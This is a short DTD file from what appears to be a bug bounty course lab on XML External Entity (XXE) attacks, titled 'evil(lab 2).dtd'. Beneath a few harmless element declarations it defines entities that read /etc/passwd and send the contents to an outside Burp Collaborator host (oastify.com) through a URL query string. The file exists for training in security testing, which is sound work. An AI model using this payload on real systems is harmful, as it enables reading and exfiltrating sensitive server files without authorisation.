Bug Bounty/Nahamsec intro to bug hunting/10 XML External Entity (XXE)/evil(lab 2).dtd

<!ELEMENT contacts (contact*)>
<!ELEMENT contact (name, email)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT email (#PCDATA)>

<!-- Read the target file (e.g., /etc/passwd) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- Exfiltrate its contents via your Collaborator payload -->
<!ENTITY exfil SYSTEM "http://ntkfyghy8xz69r6pxy3bx0fm2d86w2kr.oastify.com/?data=%file;">

